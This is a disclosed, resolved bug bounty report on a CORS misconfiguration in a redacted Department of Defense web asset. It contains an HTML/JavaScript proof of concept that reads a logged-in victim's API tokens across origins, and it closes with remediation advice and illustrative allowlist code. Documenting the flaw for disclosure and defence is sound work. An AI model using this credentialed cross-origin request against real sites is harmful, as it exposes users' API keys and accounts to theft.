CORS Misconfiguration Leads to Exposing User Data

Disclosed: 2020-05-14 17:15:14 By waymobetta To deptofdefense
High
Vulnerability Details
**Vulnerable Asset:** https://██████/█████████/

**Discovery:**

- Upon accessing the site we discover two response headers which together indicate that a cross-domain request for sensitive information might be possible:
  1. `Access-Control-Allow-Origin`: *injectable* (the value of the request's `Origin` header is reflected back)
  2. `Access-Control-Allow-Credentials: true`
- We craft the POC below and exploit the misconfiguration by exposing the user's API key, email, first name, last name, etc. ███

**POC:**

* This is hosted on http://█████████

```html
<html>
<script>
var xhttp = new XMLHttpRequest();
// the endpoint below lists API tokens previously generated by the user
xhttp.open("GET", "https://█████/████/api/token/list", true);
// send the victim's session cookies along with the cross-origin request
xhttp.withCredentials = true;
// because the server reflects our Origin and allows credentials,
// the browser lets this page read the response body
xhttp.onload = function () {
  console.log(xhttp.responseText);
};
xhttp.send(null);
</script>
</html>
```

**Demo:** ███████

**Remediations:**

- Do not allow `Access-Control-Allow-Origin` to be set from the request's `Origin` header. Either compare the origin against an explicit allowlist of trusted origins and reflect it only on an exact match, or respond with the wildcard `*`, which browsers refuse to combine with `Access-Control-Allow-Credentials: true` (suitable only for endpoints that return no user-specific data).

## Impact

This attack works similarly to a CSRF attack in that an attacker would need to have a victim visit the attacker's website in order to trigger the exploit. If the victim is logged in, the result is full access to API keys, which serve in lieu of username/password as shown in the demo. The attacker can then perform any action within the user's account that the API allows.
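The reflected-origin behaviour described in the Discovery section, the allowlist fix from the Remediations, and the browser rule the fix relies on, modelled as an added example. This is not code from the report or from the affected site; the origins, endpoint names and function names are assumed for illustration.

```javascript
// Weak behaviour the report describes: the request's Origin header is copied
// into Access-Control-Allow-Origin while credentials are also allowed, so any
// site a logged-in victim visits can read the response.
function reflectedCorsHeaders(requestOrigin) {
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Hardened behaviour: only an exact match against a fixed set of full origins
// (scheme + host + port) is echoed back. Substring, prefix or suffix matching is
// a classic mistake ("https://app.example.mil.attacker.example" passes a suffix
// check), and "null" must never be allow-listed because sandboxed iframes and
// some redirects send Origin: null.
const ALLOWED_ORIGINS = new Set([
  "https://app.example.mil",   // assumed first-party origin
  "https://admin.example.mil", // assumed first-party origin
]);

function allowlistedCorsHeaders(requestOrigin) {
  if (!ALLOWED_ORIGINS.has(requestOrigin)) {
    // No CORS headers at all: the browser refuses the cross-origin read.
    return {};
  }
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
    // The response now varies per caller, so caches must key on Origin.
    "Vary": "Origin",
  };
}

// Browser-side rule behind the report's remediation: a credentialed response is
// exposed to the page only if Access-Control-Allow-Origin is exactly the
// requesting origin (a wildcard "*" does not qualify) and
// Access-Control-Allow-Credentials is exactly "true".
function browserWouldExposeResponse(responseHeaders, requestOrigin) {
  const acao = responseHeaders["Access-Control-Allow-Origin"];
  const acac = responseHeaders["Access-Control-Allow-Credentials"];
  return acao === requestOrigin && acac === "true";
}

// The check a tester performs: send a request carrying an attacker-chosen Origin
// and see whether the response would be readable with the victim's cookies.
function isCredentialedCorsExploitable(serverHeadersFor, attackerOrigin) {
  return browserWouldExposeResponse(serverHeadersFor(attackerOrigin), attackerOrigin);
}
```

`reflectedCorsHeaders` reproduces the condition found on the asset: `isCredentialedCorsExploitable(reflectedCorsHeaders, "https://attacker.example")` is true, while the same call against `allowlistedCorsHeaders` is false, including for look-alike origins that merely contain a trusted hostname.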
Report Stats
  • Report ID: 733017
  • State: Closed
  • Substate: resolved
  • Upvotes: 3